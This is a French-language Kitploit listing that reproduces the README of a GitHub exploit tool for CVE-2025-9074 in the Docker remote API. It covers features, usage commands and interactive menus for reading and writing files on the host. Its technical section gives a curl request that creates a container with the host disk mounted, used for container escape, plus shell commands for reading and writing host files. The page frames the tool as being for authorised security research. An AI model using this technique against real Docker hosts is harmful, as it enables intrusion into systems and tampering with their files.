Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9074-Docker-Exploit — 一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。 | Kitploit
Outils/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Container SecurityVulnerability AnalysisExploitationPenetration TestingCloud SecurityRed TeamingContainer Escape
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。

Voir le dépôt
12il y a 7 moisPas encore vérifié

CVE-2025-9074 Outil d’exécution de commandes dans des conteneurs Docker

Un outil d’exploitation puissant pour l’API distante de Docker, conçu pour la recherche et le test de sécurité sur la vulnérabilité CVE-2025-9074.

Avantages principaux

✅ Gestion entièrement automatique du cycle de vie des conteneurs : crée automatiquement des conteneurs temporaires, les nettoie après utilisation, sans laisser de traces
✅ Gestion intelligente des chemins : reconnaît et convertit automatiquement les chemins Windows au format de montage Docker
✅ Processus entièrement automatisé : pas besoin de saisir manuellement des commandes complexes, interaction par menus, opérations sur fichiers en un clic
✅ Compatibilité multiplateforme : prend en charge parfaitement Windows et Linux

Aperçu de certaines fonctionnalités

image

Fonctionnalités

  • Opérations sur les conteneurs

    • Afficher les conteneurs en cours d’exécution
    • Afficher tous les conteneurs (y compris ceux arrêtés)
    • Créer un nouveau conteneur
    • Arrêter un conteneur
    • Supprimer un conteneur
    • Exécuter une commande unique
    • Terminal interactif (nécessite la bibliothèque docker)
  • Gestion des images

    • Afficher les images locales
    • Télécharger une nouvelle image
    • Supprimer une image
  • Opérations sur les fichiers de l’hôte

    • Transférer un fichier vers l’hôte
    • Télécharger un fichier depuis l’hôte
    • Lire le contenu d’un fichier sur l’hôte
    • Écrire dans un fichier sur l’hôte
    • Gestion automatique du mappage des chemins pour Windows Docker Desktop

Description de la vulnérabilité

CVE-2025-9074 est une faille de sécurité dans l’API distante de Docker. Un attaquant peut, via un accès non autorisé à l’API Docker :

  • Exécuter des commandes arbitraires
  • Créer des conteneurs et monter des disques de l’hôte
  • Réaliser une évasion de conteneur
  • Lire/écrire des fichiers sur l’hôte

Prérequis

  • Python 3.6+

Installation des dépendances

Utilisez le fichier requirements.txt pour installer toutes les dépendances :

root@kitploit:~
pip install -r requirements.txt

Ou installez manuellement :

root@kitploit:~
pip install requests docker websocket-client

Utilisation

Utilisation de base

Exécutez le script directement, en utilisant l’adresse par défaut de l’API Docker :

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Adresse personnalisée de l’API Docker

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

Paramètres de la ligne de commande

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [options]

Options:
  -u, --url URL         Adresse de l’API Docker (par défaut : http://192.168.65.7:2375)

Détail des fonctionnalités

Opérations sur les conteneurs

  1. Afficher les conteneurs en cours d’exécution : affiche la liste de tous les conteneurs actifs
  2. Afficher tous les conteneurs : affiche tous les conteneurs (y compris ceux arrêtés)
  3. Créer un nouveau conteneur : crée un conteneur à partir d’une image spécifiée
  4. Arrêter un conteneur : arrête un conteneur en cours d’exécution
  5. Supprimer un conteneur : supprime un conteneur (peut être forcé)
  6. Exécuter une commande unique : exécute une commande unique dans le conteneur
  7. Terminal interactif : accède à un shell interactif dans le conteneur (nécessite la bibliothèque docker)

Utilisation du terminal interactif

  1. Lancez le script et sélectionnez « 1. Opérations sur les conteneurs »
  2. Sélectionnez « 1. Afficher les conteneurs en cours d’exécution »
  3. Saisissez le numéro du conteneur pour le sélectionner
  4. Sélectionnez « 2. Terminal interactif (nécessite la bibliothèque docker) »
  5. Saisissez la commande shell (par défaut : /bin/sh)
  6. Commencez les opérations interactives

Gestion des images

  1. Afficher les images : liste toutes les images locales
  2. Télécharger une image : télécharge une nouvelle image depuis Docker Hub
  3. Supprimer une image : supprime une image locale

Opérations sur les fichiers de l’hôte

Transférer un fichier vers l’hôte

root@kitploit:~
1. Transférer un fichier vers l’hôte
Veuillez saisir le chemin du fichier local : /path/to/local/file.txt
Veuillez saisir le répertoire de destination sur l’hôte : D:/temp
Veuillez saisir le nom du fichier de destination (laissez vide pour conserver le nom d’origine) : 

Télécharger un fichier depuis l’hôte

root@kitploit:~
2. Télécharger un fichier depuis l’hôte
Veuillez saisir le chemin du fichier sur l’hôte : D:/temp/file.txt
Veuillez saisir le chemin de sauvegarde local : /tmp

Lire le contenu d’un fichier sur l’hôte

root@kitploit:~
3. Lire le contenu d’un fichier sur l’hôte
Veuillez saisir le chemin du fichier sur l’hôte : D:/temp/file.txt

Écrire dans un fichier sur l’hôte

root@kitploit:~
4. Écrire dans un fichier sur l’hôte
Veuillez saisir le répertoire de destination sur l’hôte : D:/temp
Veuillez saisir le contenu du fichier : Hello, World!

Mappage des chemins pour Windows Docker Desktop

Cet outil gère automatiquement le mappage des chemins pour Windows Docker Desktop :

Chemin Windows

Formats d’entrée pris en charge :

  • D:\ ou D:/
  • D:\temp ou D:/temp
  • "D:\file.txt" (avec guillemets)
  • 'D:/file.txt' (avec guillemets)

Précautions de sécurité

⚠️ Avertissement important :

  1. Utilisation uniquement dans le cadre de tests autorisés : cet outil est destiné exclusivement aux tests de sécurité autorisés et à des fins éducatives
  2. Conformité légale : assurez-vous d’avoir obtenu une autorisation explicite du système cible avant utilisation
  3. Environnement isolé : il est recommandé d’utiliser cet outil dans un environnement de test isolé
  4. Limitations de droits : Windows Docker Desktop nécessite d’être exécuté en tant qu’administrateur pour écrire sur le disque C
  5. Ne pas abuser : toute utilisation non autorisée de cet outil peut enfreindre les lois et règlements

Principe technique

Évasion de conteneur

Créez un conteneur via l’API Docker et montez le disque de l’hôte :

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

Lecture/écriture de fichiers

Exécutez des commandes dans le conteneur pour lire/écrire des fichiers sur l’hôte :

root@kitploit:~
# Écrire un fichier
echo "content" > /tmp/file.txt

# Lire un fichier
cat /tmp/file.txt

Dépannage

Échec de la création du conteneur (erreur 500)

  • Vérifiez que l’API Docker est accessible
  • Confirmez que le format du chemin est correct
  • Vérifiez que l’image existe

Échec de l’écriture de fichier

  • Windows Docker Desktop doit être exécuté en tant qu’administrateur
  • Vérifiez les permissions du répertoire cible

Le terminal interactif ne démarre pas

  • Assurez-vous que la bibliothèque docker est installée : pip install docker websocket-client
  • Vérifiez que le terminal prend en charge le mode interactif

Développement et tests

Exécution des tests

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Structure du code

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── Fonctions de gestion des conteneurs
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── Fonctions de gestion des images
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── Fonctions d’opérations sur les fichiers de l’hôte
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── Fonctions utilitaires
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

Contribution

Les issues et les pull requests sont les bienvenues !

Licence

Ce projet est fourni uniquement à des fins éducatives et de recherche en sécurité.

Clause de non-responsabilité

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L’utilisateur assume l’entière responsabilité et tous les risques liés à l’utilisation de cet outil. L’auteur décline toute responsabilité en cas d’utilisation abusive ou non autorisée.

Références

  • Détails de la vulnérabilité CVE-2025-9074
  • Documentation de l’API distante de Docker
  • Règles de mappage des chemins pour Windows Docker Desktop
Télécharger l’outil
Chemin de montage Docker
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test